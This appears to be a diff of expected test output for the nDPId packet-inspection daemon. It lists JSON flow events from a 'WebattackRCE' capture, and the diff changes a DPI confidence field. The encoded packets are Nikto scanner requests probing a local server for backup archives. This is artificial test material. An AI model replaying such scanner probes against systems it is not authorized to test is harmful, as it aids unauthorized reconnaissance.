00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1576420277244,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277244,"pkt":"AAAAAAAAAAAAAAAACABFAADIKHJAAEAGE7x\/AAABfwAAAcRYH5BlBxDwgejT24AYAED+vAAAAQEICp1m\/SSdZv0kR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1576420277246,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277246,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/A9AAEAGQCF\/AAABfwAAAcRaH5B2IcSTgB9qe4AYAED+uQAAAQEICp1m\/SWdZv0lR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1576420277247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277247,"pkt":"AAAAAAAAAAAAAAAACABFAADFi69AAEAGsIF\/AAABfwAAAcRcH5D\/WbMzZ3h33IAYAED+uQAAAQEICp1m\/SedZv0nR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1576420277248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277248,"pkt":"AAAAAAAAAAAAAAAACABFAADDpjtAAEAGlfd\/AAABfwAAAcReH5CBd56aTxXXOIAYAED+twAAAQEICp1m\/SidZv0oR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1576420277249,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277249,"pkt":"AAAAAAAAAAAAAAAACABFAADDeldAAEAGwdt\/AAABfwAAAcRgH5A4o0L2zMH\/yIAYAED+twAAAQEICp1m\/SmdZv0pR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1576420277252,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277252,"pkt":"AAAAAAAAAAAAAAAACABFAADCJxNAAEAGFSF\/AAABfwAAAcRiH5BR2x+x8C2V44AYAED+tgAAAQEICp1m\/SydZv0rR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1576420277253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277253,"pkt":"AAAAAAAAAAAAAAAACABFAADClhFAAEAGpiJ\/AAABfwAAAcRkH5B3iK6vsi1CtIAYAED+tgAAAQEICp1m\/S2dZv0tR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1576420277255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277255,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/zTlAAEAGbv1\/AAABfwAAAcRmH5BLoPWWHSfpPoAYAED+swAAAQEICp1m\/S+dZv0vR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 